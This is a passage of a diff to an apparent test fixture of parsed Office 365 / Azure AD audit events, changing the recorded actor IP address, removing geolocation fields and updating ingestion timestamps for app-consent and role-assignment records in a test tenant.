Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -6526,25 +5950,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6558,7 +5964,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -6694,7 +6100,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -6706,12 +6112,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036282900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125018800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -6737,25 +6143,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6769,7 +6157,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -6908,7 +6296,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -6920,12 +6308,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036298400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125024300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 